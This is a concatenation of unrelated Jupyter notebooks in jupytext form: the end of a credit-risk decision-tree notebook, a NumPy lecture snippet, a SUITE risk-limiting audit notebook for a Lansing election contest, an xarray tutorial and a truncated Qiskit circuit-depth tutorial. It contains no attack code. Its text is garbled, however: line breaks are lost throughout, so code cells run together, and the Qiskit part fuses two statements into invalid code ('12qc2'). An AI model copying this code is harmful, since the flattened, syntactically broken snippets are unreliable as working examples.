df4['cb_person_default_on_file'] = lab_enc_file.fit_transform(df4['cb_person_default_on_file'])

# loan_grade: ordinal mapping, grade A (best) -> 1 ... G (worst) -> 7
enc_grade_dict = {'A':1 ,'B':2 ,'C':3 ,'D':4 ,'E':5 ,'F':6 , 'G':7}
df4['loan_grade'] = df4['loan_grade'].map( enc_grade_dict )
# -

# ### 5.0.
Feature Selection df5 = df4.copy() df5.columns cols_drop = ['df_index','age_binned','age_binned1', 'hist_binned', 'hist_binned1', 'rate_binned','emp_length_binned', 'emp_length_binned1', 'person_income_binned'] df5 = df5.drop( cols_drop, axis=1 ) # ### 6.0. Machine Learning Modelling df6 = df5.copy() df6.head() df6.columns X_credit = df6.drop('loan_status',1).values y_credit = df6.loc[:,'loan_status'].values X_cred_train, X_cred_test, y_cred_train, y_cred_teste = train_test_split(X_credit, y_credit, test_size = 0.25, random_state = 123 ,shuffle = True ,stratify = y_credit,) arvore_credit = DecisionTreeClassifier(criterion='entropy', random_state = 0) arvore_credit.fit(X_cred_train, y_cred_train) prev = arvore_credit.predict(X_cred_test) accuracy_score(y_cred_teste, prev) confusion_matrix(y_cred_teste, prev) print(classification_report(y_cred_teste, prev)) pickle.dump( arvore_credit, open ('/Users/marin/reposit/Credit_Card_Risk/algrts_ml/model_credit_risk.pkl', 'wb')) # ### 7.0. Deploy - Prediction df = df6.drop('loan_status', axis = 1) data = df.to_json(orient = 'records') #data = json.dumps(df.to_dict ( orient = 'records')) # + #url = 'http://192.168.0.108:5000/predict' url = 'https://credit-risk-model-app.herokuapp.com/predict' data = data header = {'Content-type': 'application/json'} #Request r = requests.post( url = url, data = data, headers = header) print( 'Status Code {}'.format( r.status_code ) ) # - d1 = pd.DataFrame( r.json(), columns=r.json()[0].keys() ) d1.columns d1['prediction'].value_counts().plot.barh(title="Proportion of Status") # ### 8.0. 
# Class In Production
class CreditRisk( object ):
    """Production-side preprocessing for the credit-risk model.

    Loads the scalers/encoders that were fitted during training
    (section 4 of the notebook) and applies them to incoming payloads
    before prediction.
    """

    def __init__( self ):
        # Use context managers so the pickle file handles are always closed.
        with open( 'parameter/person_age_scaler.pkl', 'rb' ) as f:
            self.person_age_scaler = pickle.load( f )
        with open( 'parameter/loan_amnt_scaler.pkl', 'rb' ) as f:
            self.loan_amnt_scaler = pickle.load( f )
        with open( 'parameter/person_income_scaler.pkl', 'rb' ) as f:
            self.person_income_scaler = pickle.load( f )
        with open( 'parameter/person_home_ownership_scaler.pkl', 'rb' ) as f:
            self.person_home_ownership_scaler = pickle.load( f )

    def data_preparation( self, df ):
        """Rescale/encode the raw feature columns of ``df`` in place.

        Parameters
        ----------
        df : pandas.DataFrame
            Payload with the raw columns 'person_age', 'loan_amnt',
            'person_income' and 'person_home_ownership' (same names as in
            the training dataframe).

        Returns
        -------
        pandas.DataFrame
            The same dataframe with those columns transformed.
        """
        # BUG FIX: transform the actual feature columns. The previous code
        # indexed columns named '<feature>_scaler' (e.g. 'person_age_scaler'),
        # which do not exist in the payload built from df6 and raised KeyError.
        df['person_age'] = self.person_age_scaler.transform( df[['person_age']].values )
        df['loan_amnt'] = self.loan_amnt_scaler.transform( df[['loan_amnt']].values )
        df['person_income'] = self.person_income_scaler.transform( df[['person_income']].values )
        # The home-ownership transformer is a LabelEncoder (see section 4.2),
        # which expects a 1-d array rather than a 2-d column slice.
        df['person_home_ownership'] = self.person_home_ownership_scaler.transform( df['person_home_ownership'] )
        return df
Credit_Risk_Prediction.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- from datascience import * import numpy as np # # NumPy Array examples # # These are some of the things we can do in NumPy! temperatures = make_array(3, 11, 7, 5, 6, 10, 12, 14, 15.6, 3.4, 2.1) temperatures # + # np.multiply? # - temperatures * (9.0/5.0) + 32 # # Some more NumPy Examples with Tables # # Let's do the same thing with tables! cities = Table().read_table("cities.csv") cities cities.column("Temperature in C") * 9.0/5.0 + 32.0 cities.with_column("Temperature in F", cities.column("Temperature in C") * 9.0/5.0 + 32.0)
coding snippets/lecture_5_6_snippets/Lecture 6 Examples.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Tools for SUITE Risk-Limiting Election Audits # # This Jupyter notebook implements some tools to conduct "hybrid" stratified risk-limiting audits as described in Risk-Limiting Audits by Stratified Union-Intersection Tests of Elections (SUITE), by Ottoboni, Stark, Lindeman, and McBurnett. # # For an implementation of tools for "comparison" risk-limiting audits as described in AGI, see http://statistics.berkeley.edu/~stark/Vote/auditTools.htm. For the sister ballot polling tool, see https://www.stat.berkeley.edu/~stark/Vote/ballotPollTools.htm. # # The tools on this page help perform the following steps: # # * Choose a number of ballots to audit in each stratum initially, on the assumption that the contest outcome is correct. # * Select random samples of ballots in each stratum. # * Find those ballots using ballot manifests. # * Determine whether the audit can stop, given the votes on the ballots in the sample. # * If the audit cannot stop yet, estimate how many additional ballots will need to be audited. # # This notebook is already filled out with an example election. It can be run from start to finish to demonstrate how the tool works. The numbers in the example can be deleted and replaced with actual data for an audit. # ## Introduction to Jupyter Notebooks # # We leave [a comprehensive introduction to the Jupyter notebook](https://jupyter-notebook.readthedocs.io/en/stable/notebook.html) to the experts, but below are a few features you should know to use this tool: # # * notebooks are comprised of _cells_, blocks of code that can be run together. To the left of a code cell, you will see either [] (indicating that it has not been run yet) or [x] (where x is a number indicating that it was the xth cell to be run). 
You can the code in a cell by clicking into the cell, indicated by a green box around the cell, and running `Ctrl + Enter`. # * code lines that begin with `#` are comments. They're not actually run, but are there to describe what the code is doing. # * the text in a notebook is also written in a cell. Instead of a code cell, it's a Markdown cell. Clicking on a text cell will make it editable; running `Ctrl + Enter` will render it back into text. # * the order in which cells are executed matters. Code in later cells depends on earlier cells. However, it is _possible_ to run cells out of order or rerun cells that have been run earlier; this can cause problem. In general, it is __best practice__ to rerun the entire notebook after you have filled in the values you want. To do so, click on the `Kernel` menu at the top of the page and select `Restart & Run All`. This will clear the memory and rerun everything in the prescribed order. # # # The following cell imports all the necessary functionality from packages. 
# + from __future__ import print_function from ipywidgets import interact, interactive, fixed, interact_manual import ipywidgets as widgets from IPython.display import display, HTML from collections import OrderedDict from itertools import product import math import json import pprint import numpy as np from ballot_comparison import ballot_comparison_pvalue from fishers_combination import maximize_fisher_combined_pvalue, create_modulus from sprt import ballot_polling_sprt from cryptorandom.cryptorandom import SHA256 from cryptorandom.sample import random_sample from suite_tools import write_audit_parameters, write_audit_results, \ check_valid_audit_parameters, check_valid_vote_counts, \ check_overvote_rates, find_winners_losers, print_reported_votes, \ estimate_n, estimate_escalation_n, \ sample_from_manifest, write_ballots_to_sample, \ audit_contest, check_polling_sample_size, plot_nratio_sample_sizes import warnings warnings.filterwarnings("ignore") # - # # Input the global audit parameters. # # For an audit, you should input the following global parameters in the cell below: # # * contest-specific parameters: # * `risk_limit`: the risk limit for the audit # * `stratum_sizes`: total ballots in the two strata, [CVR total, no-CVR total] # * `num_winners`: number of winners in the contest # * software parameters: # * `seed`: the numeric seed for the pseudo-random number generator used to draw samples of ballots. Use, e.g., 20 rolls of a 10-sided die # * `gamma`: the gamma parameter used in the ballot-polling method from <NAME> Stark (2012). Default value of 1.03905 is generally accepted # * `lambda_step`: the initial step size in the grid search over the way error is allocated across the CVR and no-CVR strata in SUITE. 
Default 0.05 is acceptable # * initial sample size estimate parameters: # * `o1_rate`: expected rate of 1-vote overstatements in the CVR stratum # * `o2_rate`: expected rate of 2-vote overstatements in the CVR stratum # * `u1_rate`: expected rate of 1-vote understatements in the CVR stratum # * `u2_rate`: expected rate of 2-vote understatements in the CVR stratum # * `n_ratio`: what fraction of the sample is taken from the CVR stratum. Default is to allocate sample in proportion to ballots cast in each stratum. # # # contest-specific parameters risk_limit = 0.09 # risk limit #stratum_sizes = [10619, 10709] stratum_sizes = [0, 10619+ 10709] num_winners = 1 # maximum number of winners, per social choice function # software parameters seed = 49228331723515618585 # use, e.g., 20 rolls of a 10-sided die gamma=1.03905 # gamma from Lindeman and Stark (2012) lambda_step = 0.05 # stepsize for the discrete bounds on Fisher's combining function # initial sample size parameters o1_rate = 0.002 # expect 2 1-vote overstatements per 1000 ballots in the CVR stratum o2_rate = 0 # expect 0 2-vote overstatements u1_rate = 0 # expect 0 1-vote understatements u2_rate = 0 # expect 0 2-vote understatements n_ratio = stratum_sizes[0]/np.sum(stratum_sizes) # allocate sample in proportion to ballots cast in each stratum check_valid_audit_parameters(risk_limit, lambda_step, o1_rate, o2_rate, \ u1_rate, u2_rate, stratum_sizes, n_ratio, num_winners) # The next cell saves the input parameters to a JSON file. You may change the file name in quotes but do not change the rest of the code. write_audit_parameters("../log/lansing_audit_parameters.json",\ risk_limit, stratum_sizes, num_winners, seed, gamma, \ lambda_step, o1_rate, o2_rate, \ u1_rate, u2_rate, n_ratio) # # Enter the reported votes # # Candidates are stored in a data structure called a dictionary. Enter the candidate name and the votes in each stratum, [votes in CVR stratum, votes in no-CVR stratum], in the cell below. 
The following cell will calculate the vote totals, margins, winners, and losers. # + # input number of winners # input names as well as reported votes in each stratum # candidates are a dict with name, [votes in CVR stratum, votes in no-CVR stratum] #candidates = {"Neal" : [3925, 3769], # "Ward": [5257, 5052]} candidates = {"Neal" : [0, 3925+3769], "Ward": [0, 5257+ 5052]} # Run validity check on the input vote totals check_valid_vote_counts(candidates, num_winners, stratum_sizes) # + # compute reported winners, losers, and pairwise margins. Nothing should be printed. (candidates, margins, winners, losers) = find_winners_losers(candidates, num_winners) # Check that overstatement rates are compatible with the reported results check_overvote_rates(margins=margins, total_votes=sum(stratum_sizes), o1_rate=o1_rate, o2_rate=o2_rate) # - # print reported winners, losers, and pairwise margins print_reported_votes(candidates, winners, losers, margins, stratum_sizes,\ print_alphabetical=False) # # Initial sample size estimates. # # The initial sample size tool helps you anticipate the number of randomly selected ballots that might need to be inspected to attain a given limit on the risk, under the assumption that the reported percentages for each candidate are correct. # # It is completely legitimate to sample one at a time and rerun the SUITE calculations, but this form can help auditors anticipate how many ballots the audit is likely to require and to retrieve ballots more efficiently. # # This code will estimate the sample size needed to attain the desired risk limit in an audit of the contest between each pair of winning and losing candidates. The overall sample size will be allocated to the CVR stratum in `n_ratio` proportion and to the no-CVR stratum in `1-n_ratio` proportion. The sample size estimates for each pair will be printed below. 
The expected sample size needed for the audit is the _maximum_ of the sample sizes for each winner, loser pair: the sample must be large enough to confirm the closest margin. # # Taking a larger initial sample can avoid needing to expand the sample later, depending on the rate of ballots for each candidate in the sample. Avoiding "escalation" can make the audit less complicated. # # + # Calculate expected sample size across (winner, loser) pairs sample_sizes = {} for k in product(winners, losers): sample_sizes[k] = estimate_n(N_w1 = candidates[k[0]][0],\ N_w2 = candidates[k[0]][1],\ N_l1 = candidates[k[1]][0],\ N_l2 = candidates[k[1]][1],\ N1 = stratum_sizes[0],\ N2 = stratum_sizes[1],\ o1_rate = o1_rate,\ o2_rate = o2_rate,\ u1_rate = u1_rate,\ u2_rate = u2_rate,\ n_ratio = n_ratio,\ risk_limit = 0.09,\ gamma = gamma,\ stepsize = lambda_step,\ min_n = 5,\ risk_limit_tol = 0.8) # + sample_size = np.amax([v[0]+v[1] for v in sample_sizes.values()]) print("estimated sample sizes for each contest, written as (cvr stratum, no-cvr stratum):\n") pprint.pprint(sample_sizes) print('\n\nexpected total sample size needed to confirm all pairs:', sample_size) # - check_polling_sample_size(candidates, winners, losers, stratum_sizes, risk_limit) # + # Run this cell to plot the total size as a function of n_ratio #plot_nratio_sample_sizes(candidates, winners, losers, stratum_sizes, n_ratio_step=0.05, o1_rate=o1_rate) # - # # Random sampling # The next tool helps generate pseudo-random samples of ballots in each stratum. Further below, there is a form to help find the individual, randomly selected ballots among the batches in which ballots are stored. # # The first cell below initializes the SHA-256 cryptographically secure pseudo-random number generator. Details on why you might want to use this pseudo-random number generator instead of the Python default can be found in [Stark and Ottoboni (2018)](https://arxiv.org/abs/1810.10985). 
# # Input your desired sample sizes in the second cell below. Input the number of ballots you want in the sample. The default values that are pre-filled are taken from the initial sample size estimates above. # # The third cell should not be modified. It draws the samples from each stratum, using sampling _with_ replacement for the CVR stratum and sampling _without_ replacement for the no-CVR stratum. This means that some ballots in the CVR stratum could be sampled more than once. # # # **NOTE:** # If this section is giving errors, you probably need to update your version of `cryptorandom`. # # ``` # pip install [--update] cryptorandom # ``` # initialize the PRNG prng = SHA256(seed) # Input the sample sizes for each stratum. # Defaults to those found using the initial sample size tool above. n1 = math.ceil(sample_size*n_ratio) n2 = sample_size-n1 # + # CVR stratum initial sample size, sampled with replacement sample1 = prng.randint(1, stratum_sizes[0]+1, size=n1) # No-CVR ballots are sampled without replacement sample2 = random_sample(stratum_sizes[1], size=n2, replace=False, prng=prng) # - # ### CVR stratum sample print("CVR stratum sample:\n", sample1) m = np.zeros_like(sample1, dtype=bool) m[np.unique(sample1, return_index=True)[1]] = True print("CVR stratum repeated ballots:\n", sample1[~m]) # ### No-CVR sample print("No-CVR stratum sample:\n", sample2) # # Find ballots using ballot manifest # # Generally, ballots will be stored in batches, for instance, separated by precinct and mode of voting. To make it easier to find individual ballots, it helps to have a ballot manifest that describes how the ballots are stored. # # # Batch label | ballots # --- | --- # Polling place precinct 1 | 130 # Vote by mail precinct 1 | 172 # Polling place precinct 2 | 112 # Vote by mail precinct 2 | 201 # Polling place precinct 3 | 197 # Vote by mail precinct 3 | 188 # # If ballot 500 is selected for audit, which ballot is that? 
If we take the listing of batches in the order given by the manifest, and we require that within each batch, the ballots are in an order that does not change during the audit, then the 500th ballot is the 86th ballot among the vote by mail ballots for precinct 2: The first three batches have a total of 130+172+112 = 414 ballots. The first ballot in the fourth batch is ballot 415. Ballot 500 is the 86th ballot in the fourth batch. The ballot look-up tool transforms a list of ballot numbers and a ballot manifest into a list of ballots in each batch. # # There must be separate ballot manifests for ballots in the CVR stratum and for ballots in the no-CVR stratum. The manifests should be input as a CSV file with three columns: Batch ID, Scanner ID, and number of ballots. # # The total number of ballots in the manifest must equal the number cast in the contest that is to be audited using the sample. cvr_sample = sample_from_manifest(filename="../data/City of Lansing Ballot Manifest - Absentee - less 45.csv", \ sample=sample1, \ stratum_size=stratum_sizes[0]) write_ballots_to_sample("../log/Lansing-sampled-absentee.csv", cvr_sample) print("CVR sample") display(HTML( '<table><tr>{}</tr></table>'.format( '</tr><tr>'.join( '<td>{}</td>'.format('</td><td>'.join(str(_) for _ in row)) for row in cvr_sample) ) )) nocvr_sample = sample_from_manifest(filename="../data/City of Lansing Ballot Manifest - Election Day - 20 precincts only.csv", \ sample=sample2, \ stratum_size=stratum_sizes[1]) write_ballots_to_sample("../log/Lansing-sampled-election-day.csv", nocvr_sample) print("No CVR sample") display(HTML( '<table><tr>{}</tr></table>'.format( '</tr><tr>'.join( '<td>{}</td>'.format('</td><td>'.join(str(_) for _ in row)) for row in nocvr_sample) ) )) # # Enter the sample data # # The audit cannot stop until **all** the sampled ballots have been examined. 
# ## Sample statistics for the CVR stratum (stratum 1) # # Enter the number of 1-vote and 2-vote over-/understatements that were observed in the sample using the sliders below, then run the cell beneath the sliders to store the values. n1=0 print("The sample size in the CVR stratum was", n1) # + def cvr_audit_inputs(o1, o2, u1, u2): return (o1, o2, u1, u2) cvr_stats = interactive(cvr_audit_inputs, o1 = widgets.IntSlider(min=0,max=n1,value=0), u1 = widgets.IntSlider(min=0,max=n1,value=0), o2 = widgets.IntSlider(min=0,max=n1,value=0), u2 = widgets.IntSlider(min=0,max=n1,value=0)) display(cvr_stats) # - (o1, o2, u1, u2) = [cvr_stats.children[i].value for i in range(4)] # ## Sample statistics for the no-CVR stratum (stratum 2) # # Enter the number of ballots for each candidate that were observed in the sample using the sliders below, then run the cell beneath the sliders to store the values. n2 = 258 print("The sample size in the no-CVR stratum was", n2) # + nocvr_widgets=[] # create the widgets for name in candidates.keys(): nocvr_widgets.append(widgets.IntSlider(value=0,min=0,max=n2,description=name)) # group the widgets into a FlexBox nocvr_audit_inputs = widgets.VBox(children=nocvr_widgets) # display the widgets display(nocvr_audit_inputs) # + # no-CVR sample is stored in a dict with name, votes in the sample observed_poll = {} for widget in nocvr_widgets: observed_poll[widget.description] = widget.value assert np.sum(list(observed_poll.values())) <= n2, "Too many ballots input" pprint.pprint(observed_poll) # - # # What's the risk for this sample? # # The audit looks at every (winner, loser) pair in each contest. Auditing continues until there is strong evidence that every winner in a contest got more votes than every loser in the contest. It does this by considering (winner, loser) pairs. The SUITE risk for every pair will appear beneath the cell below after it is run. The audit continues until all the numbers are not larger than the risk limit. 
E.g., if the risk limit is 10%, the audit stops when the numbers in the table are all less than 0.1. # Find audit p-values across (winner, loser) pairs n1=0 audit_pvalues = audit_contest(candidates, winners, losers, stratum_sizes, \ n1, n2, o1, o2, u1, u2, observed_poll, \ risk_limit=risk_limit, gamma=gamma, stepsize=lambda_step) pprint.pprint(audit_pvalues) # + # Track contests not yet confirmed contests_not_yet_confirmed = [i[0] for i in audit_pvalues.items() \ if i[1]>risk_limit] print("Pairs not yet confirmed:\n", contests_not_yet_confirmed) winners_not_yet_confirmed = list(set(list(map(lambda x: x[0], contests_not_yet_confirmed)))) losers_not_yet_confirmed = list(set(list(map(lambda x: x[1], contests_not_yet_confirmed)))) # + # Save everything to file, you may change the file name in quotes write_audit_results("../log/lansing_audit_results.json", \ n1, n2, sample1, sample2, \ o1, o2, u1, u2, observed_poll, \ audit_pvalues, prng.getstate()) # - # # Escalation guidance: how many more ballots should be drawn? # # This tool estimates how many more ballots should be examined to confirm any remaining contests. The enlarged sample size is based on the following: # * ballots that have already been sampled # * assumption that we will continue to see overstatements and understatements at the same rate that they've been observed in the sample so far # * assumption that vote proportions in the ballot-polling stratum will reflect the reported proportions # # Given these additional numbers, return to the sampling tool and draw additional ballots, find them with the ballot manifest tool, update the observed sample values, and rerun the SUITE risk calculations. Additional code cells to do this are included below. # + sample_sizes_new = {} # Add a reminder note about the candidate dict structure. 
for k in contests_not_yet_confirmed: sample_sizes_new[k] = estimate_escalation_n(\ N_w1 = candidates[k[0]][0],\ N_w2 = candidates[k[0]][1],\ N_l1 = candidates[k[1]][0],\ N_l2 = candidates[k[1]][1],\ N1 = stratum_sizes[0],\ N2 = stratum_sizes[1],\ n1 = 0,\ n2 = 258,\ o1_obs = o1,\ o2_obs = o2,\ u1_obs = u1,\ u2_obs = u2,\ n2l_obs = observed_poll[k[1]],\ n2w_obs = observed_poll[k[0]],\ n_ratio = 0,\ risk_limit = risk_limit,\ gamma = gamma,\ stepsize = lambda_step, risk_limit_tol = 0.8) # + sample_size_new = np.amax([v[0]+v[1] for v in sample_sizes_new.values()]) n1_new = np.amax([v[0] for v in sample_sizes_new.values()]) n2_new = np.amax([v[1] for v in sample_sizes_new.values()]) print("estimated sample sizes for each contest, written as (cvr stratum, no-cvr stratum):\n") pprint.pprint(sample_sizes_new) print('\n\nexpected total sample size needed to confirm remaining pairs:', sample_size_new) print("\nDraw this many additional ballots in the CVR stratum:", n1_new - n1) print("Draw this many additional ballots in the no-CVR stratum:", n2_new - n2) # - # # Draw additional ballots # print the current state of the PRNG after drawing the initial samples print(prng) # + # CVR stratum sample size, sampled with replacement sample1 = prng.randint(1, stratum_sizes[0]+1, size=n1_new - n1) # No-CVR ballots are sampled without replacement remaining_ballots = [i for i in range(stratum_sizes[1]) if i not in sample2] sample2 = random_sample(remaining_ballots, size=n2_new - n2, replace=False, prng=prng) # - # ### CVR stratum sample print("CVR stratum sample:\n", sample1) m = np.zeros_like(sample1, dtype=bool) m[np.unique(sample1, return_index=True)[1]] = True print("CVR stratum repeated ballots:\n", sample1[~m]) # ### No-CVR sample print("No-CVR stratum sample:\n", sample2) # # Find ballots using ballot manifest cvr_sample = sample_from_manifest(filename="../data/City of Lansing Ballot Manifest - Absentee.csv", \ sample=sample1, \ stratum_size=stratum_sizes[0]) 
write_ballots_to_sample("../log/lansing-sampled-absentee-2.csv", cvr_sample) print("CVR sample") display(HTML( '<table><tr>{}</tr></table>'.format( '</tr><tr>'.join( '<td>{}</td>'.format('</td><td>'.join(str(_) for _ in row)) for row in cvr_sample) ) )) nocvr_sample = sample_from_manifest(filename="../data/City of Lansing Ballot Manifest - Election Day.csv", \ sample=sample2, \ stratum_size=stratum_sizes[1]) write_ballots_to_sample("../log/lansing-sampled-election-day-2.csv", nocvr_sample) print("No CVR sample") display(HTML( '<table><tr>{}</tr></table>'.format( '</tr><tr>'.join( '<td>{}</td>'.format('</td><td>'.join(str(_) for _ in row)) for row in nocvr_sample) ) )) # # Enter the data from the *combined* sample # ## Sample statistics for the CVR stratum (stratum 1). # Update the numbers below to include what was seen in the initial sample PLUS what was seen in the new sample. print("The initial sample size in the CVR stratum was", n1, \ "and the new sample size was", n1_new) print("The observed overstatements and understatements from the original sample were") pprint.pprint({"o1" : o1, "o2" : o2, "u1" : u1, "u2" : u2}) # + # Number of observed... def cvr_audit_inputs(o1, o2, u1, u2): return (o1, o2, u1, u2) cvr_stats = interactive(cvr_audit_inputs, o1 = widgets.IntSlider(min=0,max=n1_new,value=0), u1 = widgets.IntSlider(min=0,max=n1_new,value=0), o2 = widgets.IntSlider(min=0,max=n1_new,value=0), u2 = widgets.IntSlider(min=0,max=n1_new,value=0)) display(cvr_stats) # - (o1, o2, u1, u2) = [cvr_stats.children[i].value for i in range(4)] # ## Sample statistics for the no-CVR stratum (stratum 2) # Update the numbers below to include what was seen in the initial sample PLUS what was seen in the new sample. 
print("The initial sample size in the no-CVR stratum was", n2, \ "and the new sample size was", n2_new) print("The observed tallies from the original sample were") pprint.pprint(observed_poll) # + nocvr_widgets=[] # create the widgets for name in candidates.keys(): nocvr_widgets.append(widgets.IntSlider(value=0,min=0,max=n2_new,description=name)) # group the widgets into a FlexBox nocvr_audit_inputs = widgets.VBox(children=nocvr_widgets) # display the widgets display(nocvr_audit_inputs) # + # no-CVR sample is stored in a dict with name, votes in the sample observed_poll = {} for widget in nocvr_widgets: observed_poll[widget.description] = widget.value assert np.sum(list(observed_poll.values())) <= n2_new, "Too many ballots input" pprint.pprint(observed_poll) # - # # What's the risk for this sample? # # The audit looks at every (winner, loser) pair in each contest. Auditing continues until there is strong evidence that every winner in a contest got more votes than every loser in the contest. It does this by considering (winner, loser) pairs. The SUITE risk for every pair will appear beneath the cell below after it is run. The audit continues until all the numbers are not larger than the risk limit. E.g., if the risk limit is 10%, the audit stops when the numbers in the table are all less than 0.1. 
# + # Find audit p-values across (winner, loser) pairs audit_pvalues = audit_contest(candidates, winners_not_yet_confirmed, \ losers_not_yet_confirmed, stratum_sizes, \ n1_new, n2_new, o1, o2, u1, u2, observed_poll, \ risk_limit=risk_limit, gamma=gamma, stepsize=lambda_step) pprint.pprint(audit_pvalues) # + # Track contests not yet confirmed contests_not_yet_confirmed = [i[0] for i in audit_pvalues.items() \ if i[1]>risk_limit] print("Pairs not yet confirmed:\n", contests_not_yet_confirmed) # + # Save everything to file, you may change the file name in quotes write_audit_results("../log/lansing_audit_results2.json", \ n1_new, n2_new, sample1, sample2, \ o1, o2, u1, u2, observed_poll, \ audit_pvalues, prng.getstate())
code/lansing_SUITE.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # 11 Xarray # # Objectives # # * Use the xarray package to connect with the HSDS # * Understand the basic data structures in Xarray # * Read and write netCDF files using Xarray and h5netcdf # * Plotting using Xarray # h5netcdf package not pre-installed, so install here # ! pip install h5netcdf import xarray as xr # This is the location of a NetCDF file that has been installed in HDFLab # The "hdf5:/" prefix indicates it's an HSDS domain rather than a regular posix file domain_path = "hdf5://shared/NASA/NEX-DCP30/tasmax_amon_BCSD_rcp60_r1i1p1_CONUS_NorESM1-M_202101-202512.nc" # load the dataset # Note - xarray uses the term "dataset" to refer to what HDF5 users would call a file # An HDF5 dataset is called a "variable". This can be a bit confusing! # The engine parameter says to use the h5netcdf package. In turn h5netcdf will use h5pyd # when it sees the "hdf5://" prefix in the domain path ds = xr.open_dataset(domain_path, engine="h5netcdf") # From here on, everything is much the same as with XArray used with regular posix files # the standard representation of a dataset will show dimensions, coordinates, data, and attribute # components ds # pull out "tasmax" dataarray with dictionary syntax tasmax = ds["tasmax"] tasmax # or by using dot notation ds.tasmax # named dimensions ds.tasmax.dims # extracting coorindate variables from .coords ds.coords["lon"] # .attrs is a dictionary that can contain arbitrary python objects. Much like with h5py or h5pyd tasmax.attrs # The data array is three-dimensional: time, lon, and lat coordinates tasmax.shape # Plotting methods are built into Xarray. # Xarray uses it's mapping of dimensions to correctly setup # plot axes and legend # time=1 will plot the second time index ds.tasmax.isel(time=1).plot(x="lon")
Tutorial/11-Xarray.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ![qiskit_header.png](../../images/qiskit_header.png) # ## Table of contents # # 1) [Introduction](#introduction) # # # 2) [Circuit Depth](#depth) # # # 3) [Circuit Unitary Factors](#unitary) # # # 4) [Circuits with Classical Registers](#classical) # # # 5) [Gate Set Dependence of Depth](#gate_dependence) # from qiskit import * # %matplotlib inline # ## Introduction <a name='introduction'></a> # # When constructing quantum circuits, there are several properties that help quantify the "size" of the circuits, and their ability to be run on a noisy quantum device. Some of these, like number of qubits, are straightforward to understand, while others like depth and number of tensor components require a bit more explanation. Here we will explain all of these properties, and, in preparation for understanding how circuits change when run on actual devices, highlight the conditions under which they change. # # # ### Basics # Consider the following circuit: # + qc = QuantumCircuit(12) for idx in range(5): qc.h(idx) qc.cx(idx, idx + 5) qc.cx(1, 7) qc.x(8) qc.cx(1, 9) qc.x(7) qc.cx(1, 11) qc.swap(6, 11) qc.swap(6, 9) qc.swap(6, 10) qc.x(6) qc.draw() # - # From the plot, it is easy to see that this circuit has 12 qubits, and a collection of Hadamard, CNOT, X, and SWAP gates. But how to quantify this programmatically? Because we can do single-qubit gates on all the qubits simultaneously, the number of qubits in this circuit is equal to the **width** of the circuit: qc.width() # <div class="alert alert-block alert-warning"> # <b>Warning:</b> For a quantum circuit composed from just qubits, the circuit width is equal to the number of qubits. This is the definition used in quantum computing. 
However, for more complicated circuits with classical registers, and classically controlled gates, this equivalence breaks down. As such, from now on we will <b>not</b> refer to the number of qubits in a quantum circuit as the width. # </div> # We can also just get the number of qubits directly: qc.n_qubits # It is also straightforward to get the number and type of the gates in a circuit using `count_ops()`: qc.count_ops() # We can also get just the raw count of operations by computing the circuits **size**: qc.size() # ## Quantum Circuit Depth <a name="depth"></a> # A particularly important circuit property is known as the **depth**. The depth of a quantum circuit is a measure of how many "layers" of quantum gates, executed in parallel, it takes to complete the computation defined by the circuit. Because quantum gates take time to implement, the depth of a circuit roughly corresponds to the amount of time it takes the quantum computer to execute the circuit. Thus, the depth of a circuit is one important quantity used to measure if a quantum circuit can be run on a device. # # The depth of a quantum circuit has a mathematical definition as the longest path in a directed acyclic graph (DAG). However, such a definition is a bit hard to grasp, even for experts. Fortunately, the depth of a circuit can be easily understood by anyone familiar with playing [Tetris](https://en.wikipedia.org/wiki/Tetris). To understand this, let us redraw the circuit with the first five CNOT gates colored differently for clarity: # ![depth_1.png](attachment:depth_1.png) # To compute the depth, we turn the circuit counterclockwise so that the beginning of the circuit is at the bottom. We then let the gates fall to the bottom. Later gates stack on earlier gates, and multi-qubit gate components must be stacked at the same height. 
For the current circuit of interest, this stacking looks like: # ![depth_2.png](attachment:depth_2.png) # We can see that the first five CNOT gates all collapsed down on top of each other, and are stacked on top of the initial set of Hadamard gates. The remaining gates stack on top of the CNOT layer as shown. The stack of gates can be partitioned into "layers", where each layer represents a set of gates that can be executed in parallel on a quantum device (Hardware limitations may restrict the number and/or type of gates that can be run in parallel). The **depth** of the circuit is just the number of layers in the circuit; The depth is equal to the height of the stack of gates. This computation is done for you in qiskit, and we can verify our visual method: qc.depth() # ## Unitary Factors <a name="unitary"></a> # # The circuit we are focusing on here is a 12-qubit circuit. However, does this circuit actually require a 12-qubit quantum computer to run? That is to say, can we compute the same result by running a collection of smaller circuits individually? # # In the limit where only single-qubit gates are performed, it should be clear that each qubit is controlled independently of the rest, and thus we can run each qubit independently and still get the desired result. Thus, the question becomes are there enough entangling gates in the circuit to have all qubits interacting? Again, this is best understood in terms of diagrams. Below, we track the sets of qubits that interact amongst themselves via CNOT gates at each layer in the circuit. # ![tensor_factors_1.png](attachment:tensor_factors_1.png) # We can see that at the end of the computation there are three independent sets of qubits. Thus, our 12-qubit computation is actual two two-qubit calculations and a single eight-qubit computation. 
We can verify this via qiskit: qc.num_unitary_factors() # ## Circuits with Classical Registers and Measurements <a name="classical"></a> # # Several of the circuit properties introduced so far change when adding classical registers and measurements. # # Let's add measurements to the circuit above. # + qubit_count = 12qc2 = QuantumCircuit(qubit_count, qubit_count) for idx in range(5): qc2.h(idx) qc2.cx(idx, idx + 5) qc2.cx(1, 7) qc2.x(8) qc2.cx(1, 9) qc2.x(7) qc2.cx(1, 11) qc2.swap(6, 11) qc2.swap(6, 9) qc2.swap(6, 10) qc2.x(6) qc2.barrier() qc2.measure(range(qubit_count), range(qubit_count)) qc2.draw() # - # The **width** of the circuit now includes the number of qubits _and_ number of classical bits: qc2.width() # The number of operations has increased because of the measurements and the barrier we used: qc2.count_ops() # and the **size** of the circuit has grown: qc2.size() # The **depth** of the circuit has now increased because measurements are included in the depth computation as they perform physical operations: qc2.depth() # Barriers and other special commands like snapshots do not count towards the depth directly. However, gates cannot pass through them and must therefore start 